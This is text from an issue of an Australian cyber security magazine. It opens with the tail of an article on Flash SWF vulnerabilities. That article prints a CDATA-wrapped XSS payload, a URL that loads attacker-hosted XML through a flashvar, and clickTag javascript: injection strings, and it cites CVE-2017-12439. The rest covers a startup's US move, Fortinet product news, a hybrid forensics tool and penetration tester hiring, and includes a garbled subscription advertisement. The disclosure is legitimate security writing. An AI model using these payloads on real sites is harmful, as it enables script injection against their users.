redirects, as well as XSS, thus allowing an attacker to execute malicious client-side scripts.
'As opposed to deep diving into flash exploitation and the various attack vectors. This article will be focusing on a more generic overview, prior to presenting my own findings, as a reminder as to how Shockwave Flash (SWF) files can pose a threat ' In terms of exploiting such vulnerabilities through a cross-domain approach, some vendors incorporate an XML config file, to control the behaviour of the SWF. Therefore, these SWF files may have a dynamic flashvar pointing to a config file on the same server the SWF is hosted on. However, if this flashvar can be controlled by the attacker externally, with a correct cross-domain policy configured on the attacking server, all that is required is to remotely call a malicious XML variation (hosted on an attacker’s server), which in turn will include the instructions to control the SWF, thus determining its behaviour. The attack vectors associated with this method of exploitation remains similar as to that of the above, however, the methods slightly vary. For example, an XSS payload is incorporated within an XML entity, either as a variable’s value, or included in an arbitrary sense, through the malicious XML via the use of CDATA: [CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/ script<![CDATA[>]]> This would then be called in the manner of: http://example.com/swf/example.swf?xml_path=//attacker. com/poc.xml I identified this issue within many SWF generators and slideshow makers, including that of a Windows application titled Flash Slideshow Maker Professional, with version 5.20 and below being vulnerable in the way they handle ‘advanced’ file behaviour. See CVE-2017-12439 for more information. Due to length constraints, if you’re wanting more information regarding SWF analysis, visit my blog http:// ret2eax.pw, additionally, the following resource are very informative: https://soroush.secproject.com/downloadable/ flash_it_baby_v2.0.pptx
The above example can be exploited via: ?clickTag=javascript:confirm(document.domain); or ?clickTag=//ret2eax.pw
Australian Cyber Security Magazine | 31
Cover Feature Cyber Security
Moving to Silicon Valley By Graeme Speak
Note from the Editor: The ACSM team recently caught up with Australian entrepreneur, Graeme Speak, who recently relocated to the U.S. to continue the growth and development of his cyber start-up, BankVault. After a short conversation, it seemed important to us that Graeme tells his story, since there are lessons for us all. Graeme agreed to write about his journey from Australia to Silicon Valley, with the intention of helping other Australian entrepreneurs rationalise the value of international reallocation, while hopefully busting a few myths relating to keeping business onshore as opposed to losing them overseas. TC
W
hen I read about another of Australia’s tech businesses moving to Silicon Valley or London, I often note a subtext in the article about the ‘nation’s loss’, yet for many companies seeking to grow, including my own, it simply had to be considered. For most companies, including BankVault, location is rarely a zero-sum choice, where you simply leave Australian shores forever, and I think that for the long term, Australia would be wise to take a more strategic and holistic view. With global uncertainty forming around the digitisation and automation of many industries, Australia’s capacity to be a good proposition for businesses will invariably need to consider itself in a more global and connected context. Bemoaning the loss of a company overseas overlooks a far bigger game. Australia can and does benefit from the traction that hundreds of Australian businesses gain in Silicon Valley and around the world.
32 | Australian Cyber Security Magazine
The networks, relationships and business activity that connects our industries and cities to the rest of the world are fundamental to the ongoing relevance of our cities, as digitisation takes hold. BankVault spreading its activity between the US and Australia is one small part of that global connectivity. In 2016 when BankVault won the Word Cup Tech Challenge in San Francisco and embarked on our international journey, we just saw it initially as recognition of our technology by Silicon Valley. BankVault is a technology innovation company focused on cyber security. Our technology allows users to sidestep their own local computer, browser and keyboard to conduct banking, crypto-trading or other online transactions securely – regardless of whether hackers or malware have infiltrated your system. We were lucky enough to have turned heads
Cyber Security
in Australia, and quickly gained traction via industry associations in both the real estate and insurance sectors, but other important targets such as the big four banks, while interested, were far too slow to be useful. With only around 100 other banking institutions in Australia, the market here was really not big enough to sustain us. Despite progressing well and signing a major international institution, we still couldn’t get enough support. For many tech start-ups, achieving swift growth often means considering global forays. For BankVault, it really came down to having to go where the market opportunity is - the US - with more than 8600 banks and credit unions. Our World Cup Tech Challenge success earned us a meeting in New York with former Mayor and current cyber security advisor to the White House, Rudy Giuliani. The east coast financial space started to seem like a good fit for our technology, so we decided to participate in FD Global’s NYC Immersion Program, triggering a whirlwind of activity that still hasn’t slowed down. In New York, we secured further investment and appointed our first channel partner to target the high number of finance businesses there. This partner alone has direct relationships with 850 banks. That’s 8 times more than Australia, but still only 10 percent of the market in the US. On the technology side the west coast still, in my option, dominates the US. I have always had a strong network in San Francisco, so establishing a presence there for BankVault kept me in touch with our growing business on the east coast, but also enabled me to tap the tech ecosystems of Silicon Valley. I managed to secure a long-term visa, so I'm now fully committed to building the US opportunity. Most recently, in San Francisco we’ve partnered to launch into the cryptocurrency space, with a solution to stop wallets and crypto-exchange logins being hacked - there's at least $10 million dollars of cryptocurrency stolen every week. The other big markets in Europe and Asia will be next for us – if we can find the right channel partners. Once again it will come down to good connections and the value of networks. When I look at how far I’ve progressed, it's all been because of the support of other people. The deeper my network gets (and I mean meaningful relationships with good people) the more effective I become. I want to see Australia grow on the world stage, particularly in tech, but I’m exhausted by attitudes that simplify tech businesses pursuing opportunities overseas as ‘losses’. It’s never quite so straight forward. In my opinion it’s healthy for a company to grow outside of Australia. It’s like young adults going backpacking, it opens their horizons far more than they could imagine. Ultimately, I believe Australian's are generally good at staying connected to Australia, and they’ll tend to want to help fellow Australians if they can. I can’t help but think that when you look at BankVault and the thousands of other Australian businesses and Australian workers living in cities across the world, there is an amazing resource that connects the world to Australia. They’re often lamented as our best and brightest, so perhaps we should look at this so-called weakness, as something of a national strength.
What Australia could do better is to leverage these networks deeply for the benefit of Australia and Australian businesses. Many countries seek to do such things, and of course, for Australia, we have many stakeholders’ public, private and not-for-profit, working hard at it too. Overseas, much of that work is done by Austrade, that does some good work through its international offices, mission programs and business landing pads, helping to create a receptive environment for Australians venturing overseas and build opportunities for Australian businesses and industries back at home. Shortly BankVault will join the Austrade-AusCyber delegation at RSA in San Francisco, a great chance for Australian cyber-businesses and industry people to develop opportunities in region, promote Australia, and build our connections with the US. With increasing digitalisation and automation of many industries across the world, the competition for jobs and the companies that offer them is stiffening. Historically Australia has been able to get by on the back of vast commodity trade and export capacity, but with fewer jobs in these sectors, we’re being forced like everyone else to consider jobs for the future. Most nations have recognised their future prosperity is linked to technology and innovation, and they’re competing aggressively to capture jobs that relate. Efforts to attract, create and compete for jobs are becoming incredibly sophisticated. Some countries have committed to holistic, nation-wide strategies that integrate a vast range of areas ranging from industry development projects through to business grants and attraction incentives, visa and migration schemes, education programs, taxation schemes, housing and accommodation solutions, business incubation and acceleration supports, marketing campaigns and services, industry events, venture capital incentives, diplomatic support, business development, and so on. Imagine how Australia would be if we never traded or allowed immigration. Imagine how sheltered our children would be if they never travelled. The same goes for entrepreneurs. With BankVault I’ve often felt like someone who jumped off the edge simply hoping things would work, and I inevitably found people reaching out to offer support. The global experience and connections I’ve built will always be biased towards home, and as the company continues to grow, Australia will always be a strategic part of the business – of what I hope will eventually be a much bigger business. The benefit flows back in many ways. When you can appreciate the lengths that other countries are prepared to go to compete for jobs, Australia being more competitive surely begins by overcoming any hang ups we still have that ‘preventing losses’ is a realistic or even adequate approach.
Australian Cyber Security Magazine | 33
Cyber Security
Fortinet’s security transformation plans Being successful in digital transformation requires a step change in cyber security
By Tony Campbell EDITOR
A
t the annual partner conference in Las Vegas, dubbed Accelerate 18, Fortinet showed off their latest products and new features built into FortiOS 6.0. This is the first major release in three years of Fortinet’s proprietary network and security operating system and brings enhanced network visibility, automated threat detection and threat mitigation, as well as a complete SD-WAN implementation included in the base license cost. This is a big deal for Fortinet customers, since they could potentially use their existing investment to build a software defined wide area network and ditch their expensive telco-provisioned MPLS network, thus saving thousands of dollars. By raising the bar with FortiOS 6.0, Fortinet hopes to assist their channel partners and MSSP partners, on multiple levels against their rival service providers, helping both parties take valuable market share. Furthermore, each new feature is woven into Fortinet’s security fabric, so the telemetry from each product can orchestrate incident response actions across the fabric.
34 | Australian Cyber Security Magazine
Keynote Themes Digital transformation was a core theme across the entire conference. Ken Xie, Fortinet’s founder and CEO, discussed his company’s evolution since the early days of Unified Threat Management (UTM) in 2002, to 2016 when the security fabric was introduced. At each company inflection point, Fortinet anticipated the needs of the market and changed course accordingly. By 2016, enterprise technology was going through a renaissance period, with organisations pivoting to on-demand consumption models, and with hybrid cloud becoming the norm, Fortinet needed to again change course. Two major changes in business technology required resolutions in the security fabric to help modern businesses stay safe. The move to public and hybrid cloud means organisations no longer have a perimeter that is well-defined, so a way to protect information, wherever it is, needed to be introduced. Furthermore, the interconnectedness of IT and OT environments, and the
Cyber Security
"Digital transformation is creating new operating and service delivery models that provide undeniable value to users through technologies such as IoT, mobile computing and cloud-based services, generating a vast digital attack surface. As the speed and scale of cyber threats expands, security must take on its own transformation by integrating into all areas of digital technology and be able to translate user intent into automated business response. FortiOS 6.0 delivers hundreds of new features and capabilities that were designed to provide the broad visibility, integrated threat intelligence and automated response required for digital business."
- Ken Xie, founder and chief executive officer at Fortinet
rapid on-boarding of millions of Internet of Things (IoT) devices in the enterprise, have come together to create the perfect storm. Businesses are now more exposed than they’ve ever been to attacks coming from almost any battlefront. Fortinet’s answer is a layered one, with several new products in their portfolio as well as feature uplifts in FortiOS 6.0 that complement each other and help extend security into these new areas of concern. The focus has shifted to protecting data rather than systems and Xie’s tag line summarises this well, “Security from the ground up and end to end.”
catalogue allowing Fortinet customers to benefit from free security and networking on their the WAN, including many of the features you expect from a telco provided WAN solution, such as quality of service. It can network anywhere there is an Internet connection, using 3G/4G and private WAN links, so this makes WAN architectures much easier to implement across existing connectivity. Features of Fortinet’s SD_WAN implementation are as follows:
What’s New?
3. 4.
The two big product announcements were software defined wide area networking (SD-WAN) and their new cloud access security broker (CASB). Both of these products extend Fortinet’s reach beyond where their products go today. SD-WAN is an anticipated extension of Fortinet’s product
1. 2.
5. 6.
Replacement of traditional WAN routers, WAN optimisation and WAN security appliances; Application aware and with support for over 3000 applications; Granular latency status, jitter and packet-loss monitoring; Multi-broadband technology support for Ethernet, DSL and LTE – this allows customers to switch from MPLS thus saving money;x Centralised management; Fully integrated next generation firewall – certified by NSS Labs.
Australian Cyber Security Magazine | 35
Cyber Security
Ken Xie, founder and chief executive officer at Fortinet
Of course, even Fortinet would say that their SD-WAN technology is not yet best in class, but if you don’t need the capabilities of the more sophisticated products, having it for free in FortiOS 60 certainly gives you options you might not have considered. The second major product announcement, which sent murmurs of excitement around the auditorium, was their CASB product. No surprises for what the product is called, but FortiCASB comes as a subscription service designed to provide visibility, compliance, data security, and threat protection for cloud-based services. They already have support for several major SaaS providers, with FortiCASB able to control and monitor users, behaviours and data stored in the cloud. This will again reduce the number of security vendors organisations need to use and pull data and telemetry back to one console, so that security analysts and the SOC has one interface for protecting the organisation’s data, wherever it is. Integrations with Microsoft Azure, Google Cloud, Amazon AWS, Salesforce, Dropbox and Box all exist, and direct API access to all of these partner services allows complete control over the user tenancy. The CASB includes: 1. 2. 3. 4. 5. 6.
User behaviour and user activity monitoring; API access to SaaS services; Reporting and analytics for cloud usage and risk; Access security and entitlement management; Compliance management with predefined policies and audit reports; Subscription based consumption model with no installation required.
Services vs Products Fortinet has always had a channel sales model, and as such they recognise that the best way to grow their own business is to focus on their products integrating well into managed service providers’ service models. One specific
36 | Australian Cyber Security Magazine
session of note, delivered by Fortinet’s Stephen Tallent and Sony Kogin, focused on how MSSPs’ business models can be accelerated using the new features in FortiOS 6.0. For example, SD-WAN is a service that non-telco MSSPs could now offer, adding it to their service catalogue with little to no difficulty, allowing them to directly take business from the telco monopoly on WAN provision. Upskilling MSSP engineering teams to manage SD-WAN is easy, since the product set is intuitive and management interfaces are familiar to Fortinet administrators. Fortinet has already established a new MSSP support team to assist partners and MSSPs in extending their service catalogue with these new service offerings. This covers the technology aspects of the service, as you would expect, but they will also help with financial modelling and staff training, so it’s a complete MSSP accelerator service. They claim that if existing MSSPs follow their model, they can grow their business by up to 13% year on year with new offerings. The global IoT and OT markets see revenues of over $9 billion (USD) per year, and the global cloud services market is valued at over $2 billion (USD) per year, so these are great sources of growth and revenue for any MSSP that wants their fair share. “Helping our mutual channel partners stay one step ahead of the constantly evolving cybersecurity market is a commitment Fortinet and Ingram Micro share. We’ve collaborated closely to deliver advanced security solutions for those partners, pairing offerings such as FortiGuard AI with our expertise throughout the security sales cycle. Our objective is to provide channel partners with the technology, services and support they need to serve as trusted security advisors in today’s increasingly hostile threat landscape.” Eric Kohl, vice president, advanced solutions & networking, Ingram Micro
Automate, Automate, Automate We know that automation saves money, so let’s take a look at the new automation features in FortiOS 6.0. Over the past few years, we’ve heard much about the value threat intelligence (TI) brings to security operations. Yet, TI hasn’t really delivered on its promises. The vast amount of TI SOCs ingest tends to leave analysts drowning in data and alerts, which only serves to reduce their capability. At FortiGuard Labs, their threat researchers are analysing a wide array of security threats, including malware, botnets, mobile threats, and zero-day vulnerabilities and the TI they create is shared with Fortinet’s threat intelligence partners. The TI feed is also used to inform SOC analysts and FortiGate users when known threats are found within environments they protect. With FortiOS 6.0, Fortinet has introduced an automation engine, so that steps for incident response can be triggered when particular conditions are met. This means actions, such as running scripts, quarantining devices or switch ports, and sending alerts, are now possible using orchestration tooling. This is the first release of this new automation capability within the security fabric, but I’m positive that further development in this area will finally see TI and incident response converging into a defensive force to be reckoned with.
Cyber Security
"Helping our mutual channel partners stay one step ahead of the constantly evolving cybersecurity market is a commitment Fortinet and Ingram Micro share. We’ve collaborated closely to deliver advanced security solutions for those partners, pairing offerings such as FortiGuard AI with our expertise throughout the security sales cycle. Our objective is to provide channel partners with the technology, services and support they need to serve as trusted security advisors in today’s increasingly hostile threat landscape." - Eric Kohl, vice president, advanced solutions & networking, Ingram Micro John Maddison - Sr. Vice President, Products and Solutions, Fortinet
Advanced Threat Protection and Compliance Another aspect of the conference that featured heavily both in the keynotes and the technology exhibition hall was Fortinet’s Advanced Threat Protection (ATP) and their approach to addressing the new GDPR regulations that came into force in May 2018. As we all know, GDPR increases regulatory mandates. Fortinet says that the FortiGuard Security Rating Service provides expanded audit rules, and customised auditing, based on network environments, and on-demand regulatory and compliance reports. This can be used to help mitigate some of the risks relating to maintaining compliance against GDPR. In terms of other ATP measures, the FortiGuard Virus Outbreak Service (VOS), “closes the gap between antivirus updates with FortiCloud Sandbox analysis to detect and stop malware threats discovered between signature updates before they can spread throughout an organization.” Again, this theme of integration into the fabric is common across the entire set of product announcements and further strengthens Fortinet’s position as a market leader in the end-to-end protection space. Other features worth a mention are: •
•
•
The FortiGuard Content Disarm and Reconstruction Service (CDR). This proactively strips potentially malicious content from Microsoft Office and Adobe files and sanitises the most commonly used file formats for spreading malware. FortiGuard’s Indicators of Compromise (IOC) Service uses a continuously updated list of known “bad elements” and scans devices connected to their Security Fabric to identify compromised devices. The FortiSandbox ATP for Amazon Web Services, available as on-demand and BYOL, defends against advanced threats in the cloud, working alongside network, email, endpoint and other security services.
Fortinet's Security Fabric
Security Management and Incident Response Several new Incident Response (IR) lifecycle capabilities were shown to integrate into the Security Fabric to allow users to automate responses, based on predefined triggers (system events, threat alerts, user and device status) or through direct ITSM integration – they talked multiple times about their relationship with ServiceNow. Automation in terms of response methods allows security managers to quarantine, notify, or even change the configuration of security technologies, all underpinned with clever signalling (email, SMS, alerts to the SIEM, etc.) and custom reporting with real-time control of their workflow environments. Automated attack surface hardening provides recommendations and trending reports on security compliance and best practice adoption, so again this can be aligned with your OAIC, PSPF or GDPR compliance framework and can be used to benchmark your systems against similar firms in terms of size, industry and region.
Australian Cyber Security Magazine | 37
Cyber Security
Hybrid Forensics: Dealing with massive data volumes and large networks
P By Richard Adams
ractitioners working in the fields of forensics, eDiscovery and IT security are faced with several issues when dealing with multiple endpoint processing. If the typical eDiscovery/forensics approach is adopted then this has a significant negative impact on network infrastructure, due to the collection of massive amounts of (mostly useless) index data to a central point. Notwithstanding the unreliability of indexing, this is also a very slow process and requires network administrators to allow â&#x20AC;&#x2DC;agentsâ&#x20AC;&#x2122; to be installed on the targeted endpoints. A further problem with this approach is that the tools interact directly with the host operating systems and therefore may be denied access to certain files being used by the system or other applications. Hybrid Forensics is an approach designed to address these problems. It combines the ability to process multiple endpoints as a single task together with the ability to target system and application artefacts, without interference by the operating system, e.g. registry information, locked files (such as email containers) and unknown executable files.
38 | Australian Cyber Security Magazine
A key aspect of the Hybrid Forensics approach is to run a collection tool with the capability to undertake literal string searches at a disk level (rather than an operating system level), with the code running entirely in memory on each custodian, i.e. it is not installed. This provides four significant benefits: 1. Deployment is fast, easy and doesnâ&#x20AC;&#x2122;t require the participation of custodians. 2. Only responsive data is ever moved across the network, reducing the effect on network infrastructure. 3. The search process is much more effective and will find responsive material missed by the index approach, e.g. because of language issues or other indexing restrictions. 4. The speed of collection is increased, as all processing and collection is carried out in parallel, rather than individually or in small batches (a typical approach to reduce network load by queuing up jobs).
Cyber Security
'The name given to the new tool was ISEEK, which is an application that runs entirely in memory and directly accesses data on storage devices.,' By leveraging the capabilities of ISEEK, security professionals now can now carry out ad hoc searches across their networks for any form of data. In addition, a new approach to detecting suspicious files has been identified. The new approach comes from the following thought process: • To carry out its malicious activity, malware must give instructions to the operating system. • We know what forms these instructions must take. • By searching for files containing these instructions, regardless of their file extension, we can identify all executable code on a system.
Applying the hybrid forensics approach iseek In 2013 a patent was awarded that defines the Hybrid Forensics approach. The title of the patent was “Method and System for Searching for, and Collecting, ElectronicallyStored Information”. To put the approach covered by the patent into practice a new application had to be developed that could run concurrently on an unlimited number of systems, without having to be installed, while also being capable of searching data storage devices without relying on the operating system for access to files. The name given to the new tool was ISEEK, which is an application that runs entirely in memory and directly accesses data on storage devices. A suite of tools was also developed that includes ISEEK-Designer, which creates an encrypted configuration file containing the search/collection parameters, and ISEEK-Explorer, which opens the encrypted containers in which are stored the audit results and collected data for viewing and potential further processing.
Data of interest can be obtained from a selection of welldefined sources depending on the type of investigation, such as email (both application-specific and webmail), user files, system files (including the registry on Microsoft Windows machines) or deleted files. The collected data can be sent to an encrypted container on a device physically attached to the target system, while it is still running (even still in use). Alternatively, the data can be sent to an encrypted container located on a network share or even a cloud location. The Hybrid Forensics process can be replicated on as many systems as necessary. These processes run in parallel utilising the resources of each host system. Distributed collections can be undertaken by several means, including: 1. Using a deployment agent such as EasyDeploy to run PSExec instances on networked systems that will load and execute the hybrid tool; 2. Sending a disk containing the hybrid tool plus its configuration file to one or more users at the remote site, where it can be replicated and deployed as necessary by a system administrator or consultant with the appropriate access. The data will be sent to a specified target location; 3. Sending the hybrid tool plus its configuration file to a system administrator at the remote site, who can deploy the tool from a network share and login script, with the data being sent to an accessible location or using PSExec; and 4. A System Administrator using an RDP session to connect to the remote systems to run the tool manually.
Practical application An experiment to demonstrate the effectiveness of the new process and associated technology was carried out using nine custodian systems running a combination of Windows 10, Windows 10 Enterprise, Windows Server 2012 and
Australian Cyber Security Magazine | 39
Results of ISEEK deployment to nine custodian systems in a Windows domain Machine
Searched data
Responsive data
Number of files searched
Responsive Files
Responsive Emails
Time to complete
WS-1
527 MB
0
3,578
0
0
00:00:45
TRID
14 GB
0
3,772
0
0
00:02:53
WIN-2
9 GB
22 MB
84,259
57
10
00:03:21
WIN-1
13 GB
45 MB
239,017
114
20
00:03:53
ROD
25 GB
0
3,996
0
0
00:05:06
DESK-5
15 GB
0
411,187
0
0
00:08:28
TIG
21 GB
0
6,372
0
0
00:10:18
XF
33 GB
0
9,345
0
0
00:16:38
DESK-4
26 GB
12 MB
548,780
20
4
00:26:12
Windows Server 2016 in a Windows domain. Using the deployment utility, nine instances of ISEEK were started on the custodian systems in 48 seconds. ISEEK was configured to locate and collect (to a network share) files and emails containing two search terms: “Fuld & Company” and “489,628 Dth/d". Both terms are contained in PDF attachments to emails within the Enron email data set. These terms were selected because they would be difficult (if not impossible) using an index-based approach. Each custodian system had a mixture of large and small files of various types, including PST, ZIP and HTML. Three of the custodian systems were ‘seeded’ with publicly-available data - a PST from the Enron email data set. The results of the test are shown in table above. For comparison purposes, a popular digital forensics tool was used to create an index of the same data searched by ISEEK on the custodian system WIN-1. The entire process took just under 4 mins for ISEEK to complete. However, it took 51 mins for the forensics tool to index the same data on the remote system. In addition, having created an index, the forensics tool was unable to locate the search terms in the same form as that provided to ISEEK, which had completed the whole process on all nine custodian systems in under 30 minutes (with two of those systems containing responsive items processed in under 4 minutes). There was no discernible impact on network utilisation during the entire process. Ad hoc policing of large networks becomes more practical with this approach, because of the low impact on network bandwidth (especially if a ‘report-only ‘option is used). Information can be gathered quickly and easily that would typically involve installing ‘agents’ at endpoints and dedicated tools.
40 | Australian Cyber Security Magazine
Sometimes practitioners only want to know if certain criteria are met at an endpoint, rather than collect the artefacts themselves. This has been accommodated by creating an encrypted report that identifies the machine and which criteria have been met, e.g. the value of a certain registry key. In other cases, the whole registry hive may be required, and so to make subsequent review of this data easier for the practitioner ISEEK creates a plain text version that is stored along with the original hive. ISEEK is currently being deployed by a large US government contractor, a US military defence agency and a multi-national aerospace company for security, forensics, IT compliance and electronic discovery purposes. Some cases have involved looking for documents that contain sensitive material on laptops, unauthorised applications being used, hidden executable code, unauthorised storage of video collections, recent registry key changes and theft of intellectual property. Searches have included terms in Chinese, Japanese and Korean languages as well as chemical terms in the form “3-(14-hydroxypentadecyl)-3methyl-1-oxo-2,6-dihydrofuran-3-carboxylic acid”.
Cyber Security
Available online!
27
000032
Post
ed PP1
Approv
See our website for details
ATE
ENT
NM
VER
GO
AND
R RPO
w | w
u w.a
st
sec
urity
ma
THE
CO
COU
NTR Y’S
gazi
ne.c
om
.au
arch
Feb/M
2017
t a jus it trali Aus ’t hack n ca
AG
YM
URIT
SEC
E AZIN
n ralia
LEAD
ING
Post App
roved
GOVE
PP1000
03227
R
NMEN T AN RSA D CO ps RPO U Edito Conferen l sRteATE SEaC CO tica g U ce 20 r's R THE eview Prac buildin ient RITY MAGAZIN 1 r E | - PAR 7 il o www T 2 f ber res prise .aus Cybe tralia y r ks: c r nsec c e c t In a n t urity suran e Time at traffi mag le azin c to e.co start e – conv m.au Vehicminute t ersati the a on Ten loymen cy Child a iv p r ren o de Is p t cause f w ar los Crisis NY ese eist - Com Manage H Chin - Use municati ment Foc The k Cyber T e rr us r Driv o fundin orism .au Ban role en Plan comm.au ine. g law The yber nning agaz ine.co s uritym agaz nsec itym of c nce alia ecur ustr alians a .a r tr w ww .aus IT a insu be Mod e E || www o th t IN Z asre s ernis ngnge tu e ti AGAAZINE k a M a Y S in ig a e fu sue ecuri SECURgITITYyoMAG Digit Naavte cfhth t it t tyE ECtrUR ur y is Wha art city ORAT E SS ategy aga al War Cslicmape soecurit ORP RAT D C RPO a sm Islam inst the T AN CO laantidonal S MEN AND ic Sta n ERNMENT V O te G G ERN the DING GOV LEA sincguritayp Y’S ADIN Clo ge IEW NTR ’S LE COU TRY eyrsskeills US REV nels th b y THE COUN L L in C P ritssets era CcIAus Chaalinan THE u c E fo e P a S Sity r d f s tr acau &A, Drone Cybe o onnecte ecur naAlyus- M y’ an c ick TQearr d G’s s theealtCha & yecurit um ting –Time, Qucieuwrity s, n o...rism inter srtr COA ds oinnw Crea orTld indFouout ‘s Sev h more eTcehch gygle TCreonmmolosin ekrore o w n b o c y e s B u lo n C m gy – chtes enc SysRteem c testa ig o ll : F g inte estone ecur2it0y18 nition & acial d Video Mil en inMs IPS enior efine the S Wom habab, rcher, Analytics are: dTaking g ad on SoAftTwA6th1in b hin S esea y le Nous ecurity R ersSkeycLuarity eDveartion’s earch l S N Kaesnp in s rsona r res mou Wom ecial: Pe eliver cybe tono Sp on toudnifieridty of au ti u r a c u e Rise les e ir o e insrping y ss: Thr vehic Secu nication erations u and alisa? id m s fe n m a tr o o c c A s re Auresnsic key ecual fo Dsigit ING
EAD
L Y’S NTR
27 000032 27 d PP1 032 Approve d PP1000 Post Print Approve Post Print
April/
May 20
17
17 ep 20 18 Aug/S 20 March
Feb /
$8.95
INC. GST
$8.95
INC.
GST
gy holo a Psyc rviving u for s nt attack viole
$8.95
INC.
GST
INC.
GST
Sin ek in
r we
Cybe
TO THE AUSTRALIAN SECURITY MAGAZINE
Get each print issue per year for only $88.00
US
PL
2017 orld ol W ecurity Interp Cyber s chtime s | view nect and rity | Te re t ven Con in Secu nal e ines n Regio| PhilipLUpS Wome P re gapo
$8.95
1 YEAR SUBSCRIPTION
SUBSCRIBE TODAY... DON’T MISS AN ISSUE Yes! I wish to subscribe to the Australian Security Magazine, (1 year). ☐
AUSTRALIA
A$
88.00
(inc GST)
1 YEAR
☐
INTERNATIONAL
A$
158.00
(inc GST)
1 YEAR
Yes! As an additional bonus I wish to receive direct to my inbox the Asia Pacific Security Magazine (emag)
No business or government organisation survives in a vacuum. Sharing knowledge is fundamental to the development of successful security planning and implementation. That is the role of our magazine: sharing knowledge of developments in security management for public and private sector organisations, both for internal management and for external obligations in public safety and security.
Go to
www.australiansecuritymagazine.com.au/subscribe and fill in our subscription form online. Dont miss an issue! Phone: +61 (8) 6465 4732 during business hours AWST (Australia Only)
PRIORITY FAX Credit Card Details Australia +61 (8) 9467 9155
FREE POST My Security Media 286 Alexander Drive, Dianella. W.A. 6059
Email subscriptions@mysecurity.com.au
GST This document will become a TAX INVOICE for GST when payment is made. My Security Media Pty Ltd ABN 54 145 849 056
Cyber Security
Who is the most offensive tester in the room? Talking of Offensive Individuals - Penetration Testers
M By James Wooton
y love of hacking systems came from way back, before penetration testing was ever coined as a profession or term. With a timeline that looked something like: zx80, Vic20, BBC Micro and then onto early IBMs (XT, AT, PS/2) and SPARC system, I’ve hacked them all. It was around 1996 that I officially became a penetration tester, a job title that for many years has left people looking at me blankly, until you say ‘hacker.’ Then they get excited for a few seconds, before glazing over again. To be fair, jokes in binary are very dry (00100001.) To put things into perspective, this was a time of the Phrack, with hacker antics punctuated by articles such as ‘Smashing the stack for fun and profit’, written by aleph1. It was also the era of the hand-rolled Linux 1.X kernel, with flaky support, in a time when it seemed PCMCIA support would forever require source code modifications and compilation, especially if you wanted a wireless network card to work. Jumping forward twenty years, I think I’ve now established my credentials and that I’ve worked with penetration testers just about all my working life, and yes, while I’m older and greyer (acknowledge what’s left of my hair, that is), one thing has always irked me about our craft is why so few testers can write a decent report, discussing all the fun they’ve had. Just the other day, whilst reading through a less-than-
42 | Australian Cyber Security Magazine
average report, fortunately not produced by one of my team, I mused, “What combination of skills and quirks make for an exceptional penetration tester?” And when you find someone with all the skills, how do you manage them, given they are often complicated individuals with very specific needs? Looking at skills first, this is not an easy question to answer and until an autonomous ice-cream tub takes over the reins and competently tests your networks and applications, it’s a question that most of information, risk and compliance managers, or indeed hiring managers, should be considering, because not all pen testers are born or created equal. Let’s list the attributes we’re looking for in such an individual: • Anally retentive; • Won’t take no for an answer; • Thinks in binary; • Has no social life outside of testing, research and tinkering; • Dismantled all their presents before lunchtime on Christmas day; • Works 25 hours per day, not including Red Bull or caffeine breaks – or if you’re in the U.S. then Adderall; • Rarely comes up with the answer you’d expect, to pretty much any question;
Cyber Security
• •
Excels in trivia quizzes that involve facts such as films, music or books; Probably possesses a set of lock picks.
You see, the first set of interview questions are easy. All joking aside (well, not entirely), a good penetration tester has many of these attributes: • Persistence; • Logical and analytical thought patterns (until it’s time to unleash the evil – to do the unexpected); • Understands languages other than JavaScript; • Can understand the need to create a report that clearly articulates the vulnerabilities and risks faced by the target organisation, without jargon, but with context; • An ability to adapt tests through a combination of research, learning and experience; • A tee-shirt to be worn at ‘cons’. In short, what you’re looking for is a rare bird indeed, but before you sigh and think, ‘I can’t hire or afford one of those’, that’s ok, because the secret is, it’s unnecessary to hire or recruit a rock-star for many of these engagements. What? How can that be, when you’ve heard from many security companies whose sales-weasels have tried to convince you that their tests are the most comprehensive, using proprietary and/or patented technologies, combined with their own magic formula and pixie-dust? The truth is that for 99% of penetration testing engagements, you will require the same approach, the same analytical thinking and the same toolset that is universal, serving as the starting point of almost every test. If any penetration tester that tells you that every test is unique and exciting, they are full of something which won’t necessarily be skill. That said, most penetration testers will reel off all the exciting bits of the test engagements they have worked on, which probably makes it sound infinitely more exciting than it was. Then there are the 1% of unusual, extraordinary requirements, for which you will need that rare bird. Scenarios where this level of skill is required are usually reserved for organisations with mission-critical code bases, operational networks, or an organisation with a very mature security posture, who are looking for the last 20% of the 80/20 rule and are well and truly in red team territory. For these, I would suggest outsourcing – since that trustworthy gun-for-hire will likely never come and work on your payroll anyway. In all honesty, there is little point in having one of these on the books, unless you are marketing the heck out of that capability as a differentiator. There was once a very, very skilled boutique in the UK that did exactly that. The MD would, at every opportunity, espouse the virtue of their incredibly talented testers and researchers. However, they were a very skilled outfit and they sold it for a considerable sum based on that reputation, not once, but twice. It certainly can be a differentiator, but one that will bite you financially if you don’t have the pipeline. Getting back to the rock-stars, and this is by no means intended in a bad way. You will generally find them hard to manage, expensive and high-maintenance. They have a skill level and appetite for havoc that unfortunately means
that run-of-the-mill, run-rate engagements will bore them to tears in nanoseconds, and in today’s market they will quickly exit stage left. You’ll need a constant stream of exciting and challenging work to keep them stimulated, let alone awake. There’s also an ongoing requirement for investment in external engagements, conferences and tools, which will alienate the rest of your testers rapidly, if they aren’t seeing some similar love or interesting gigs, and/ or the rock-star isn’t acting as a mentor. That said, if there’s the sniff of a vulnerability, they’ll rip through applications or networks like a knife through butter. To answer my own question, I think it’s a combination of skills and capabilities that is best answered from several perspectives:
Engaging a Testing Company If you’re about to commission your first penetration test, or have switched from a regular testing company, I can’t stress this enough: Validate your test scope and understand it. Too many engagements start life as a woolly, ambiguous statement that almost always ends in a dissatisfied client. If your test requirement boils down to ‘test our networks’, have a rethink. Ask yourself, honestly, what has motivated your request, and what are your specific goals? When you know and can articulate these, do some background research on the companies offering these services. Ask for references before you engage even the most reputable of companies, since you need someone who take your requirements and transform them into a set of actions, assigned to appropriately skilled individuals – the quirky testers we profiled earlier. Have a start-up meeting with the testers and make sure you feel confident that they know what you want. Most importantly, if it sounds like pixie-dust and magic will be used, don’t engage with them, since they won’t give you a report that you can use to make improvements in your business.
